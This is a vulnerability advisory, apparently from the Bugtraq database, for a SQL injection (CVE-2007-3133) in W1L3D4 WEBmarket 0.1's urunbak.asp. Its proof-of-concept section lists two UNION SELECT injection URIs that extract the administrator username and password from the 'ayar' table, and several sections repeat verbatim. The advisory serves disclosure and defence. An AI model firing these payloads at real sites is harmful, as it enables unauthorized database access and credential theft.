W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
BID:24364
Info
W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
| Bugtraq ID: | 24364 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3133 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 07 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | RMx is credited with the discovery of this vulnerability. |
| Vulnerable: |
W1L3D4 W1L3D4 WEBmarket 0.1 |
| Not Vulnerable: | |
Discussion
W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
W1L3D4 WEBmarket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
W1L3D4 WEBmarket 0.1 is vulnerable.
W1L3D4 WEBmarket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
W1L3D4 WEBmarket 0.1 is vulnerable.
Exploit / POC
W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/[PATH]/urunbak.asp?id=-1 union+select+1,kadi,parola,3,4,5,7+from+ayar
http://www.example.com/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/[PATH]/urunbak.asp?id=-1 union+select+1,kadi,parola,3,4,5,7+from+ayar
http://www.example.com/script_path/urunbak.asp?id=25+union+select+0,1,parola,3,4,5,6+from+ayar
Solution / Fix
W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
References:
References: